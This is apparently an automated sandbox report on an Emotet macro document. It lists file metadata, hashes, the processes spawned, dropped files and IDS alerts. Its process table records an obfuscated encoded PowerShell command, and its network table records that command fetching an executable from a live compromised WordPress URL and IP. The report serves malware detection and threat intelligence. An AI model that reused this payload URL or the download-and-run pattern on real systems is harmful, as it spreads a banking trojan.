Field | Value |
---|---|
File name: | DOCUMENT_8994751.doc |
Full analysis: | https://app.any.run/tasks/495084c6-a674-4195-b313-1dd86f90090e |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it was upgraded into a very destructive piece of malware. It mostly targets corporate victims, but private users also get infected through mass spam email campaigns. |
Analysis date: | October 20, 2020, 12:35:53 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Odit., Author: Rayan Guillot, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 20 07:24:00 2020, Last Saved Time/Date: Tue Oct 20 07:24:00 2020, Number of Pages: 1, Number of Words: 2599, Number of Characters: 14816, Security: 8 |
MD5: | EACE6619E701F95942169DC757F8263D |
SHA1: | F4CF601B1699767938812E71040E4F39C5C65BB8 |
SHA256: | 8BE10269732FD1D76955A97DA47A71CDD76FE08BCE15EA71827905BB2E093FEC |
SSDEEP: | 3072:NOr++urKzWWigMoP/8FJ94rf1nFJsVllZ1Uyi8UwdzhLYo/cNJivKie6B/w2yiWN:SJiP/w2PoCLpZY0tRhoP |
Extension | Detected type |
---|---|
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
Property | Value |
---|---|
Title: | Odit. |
Subject: | - |
Author: | Rayan Guillot |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2020:10:20 06:24:00 |
ModifyDate: | 2020:10:20 06:24:00 |
Pages: | 1 |
Words: | 2599 |
Characters: | 14816 |
Security: | Locked for annotations |
Company: | - |
Lines: | 123 |
Paragraphs: | 34 |
CharCountWithSpaces: | 17381 |
AppVersion: | 15 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | - |
CodePage: | Unicode UTF-16, little endian |
LocaleIndicator: | 1033 |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2976 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\DOCUMENT_8994751.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
 | User: admin, Company: Microsoft Corporation, Integrity Level: MEDIUM, Description: Microsoft Word, Version: 14.0.6024.1000 | | | |
3480 | POwersheLL -ENCOD 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 | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | — | wmiprvse.exe |
 | User: admin, Company: Microsoft Corporation, Integrity Level: MEDIUM, Description: Windows PowerShell, Exit code: 0, Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
3156 | C:\Users\admin\Kxal0_n\Yfo6o20\Eoq7isj.exe | C:\Users\admin\Kxal0_n\Yfo6o20\Eoq7isj.exe | — | wmiprvse.exe |
 | User: admin, Company: Twenty Squares, Integrity Level: MEDIUM, Description: Addictedsarah chaturbate iree token, Exit code: 0, Version: 1.00 | | | |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2976 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR54AC.tmp.cvr | — | — | — |
3480 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2VJTCT6AX2BK68FXY5HT.temp | — | — | — |
3156 | Eoq7isj.exe | C:\Users\admin\AppData\Local\Temp\~DF70526DD78B5B1E50.TMP | — | — | — |
3480 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | B8D28A0751A092388652CF6B1F64DABE | BFC8F6304F913269DA5A5B86F1EA87E55AB280927CDDDF355A74454F563FAD89 |
2976 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 1ACB5C67FDBAC9D9393CFB80E89AA4C4 | 52A5D9598FAE7943D29A9034E00CB59326EDE82055877DAC9460F791B5E6A472 |
2976 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | AEB89835EF5C8186077076004A20AF22 | 1CC75C7E5703726EE33A14728D6E2C7240B43C5B72B370DE19BBA4C3846526EE |
2976 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | 1BA2047048E91EDB1110E573CFAAE418 | 2FE9C7298A68453C33FC546050BFF27603F3210DB7F39B7536DA054261E78A6E |
2976 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\DOCUMENT_8994751.doc.LNK | lnk | 9EEA141D3BBF7BECB26777D49B48037D | 13D6125498A86421A73EA7528F762EE66C70FF5827F7DA6B24A2262E8069660D |
3480 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16644c.TMP | binary | B8D28A0751A092388652CF6B1F64DABE | BFC8F6304F913269DA5A5B86F1EA87E55AB280927CDDDF355A74454F563FAD89 |
2976 | WINWORD.EXE | C:\Users\admin\Desktop\~$CUMENT_8994751.doc | pgc | A62227B155E775B2DF694E93970D84D5 | B71EE8DFF9D3DC34F6077F171A9D3F8B290D58EC9F234EB16F3D44FFCBB43E41 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3480 | POwersheLL.exe | GET | 200 | 27.254.111.200:80 | http://myanmarlegalservices.com/wp-admin/3h/ | TH | executable | 336 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3480 | POwersheLL.exe | 27.254.111.200:80 | myanmarlegalservices.com | CS LOXINFO Public Company Limited. | TH | suspicious |
Domain | IP | Reputation |
---|---|---|
myanmarlegalservices.com | | suspicious |
PID | Process | Class | Message |
---|---|---|---|
3480 | POwersheLL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3480 | POwersheLL.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
3480 | POwersheLL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3480 | POwersheLL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |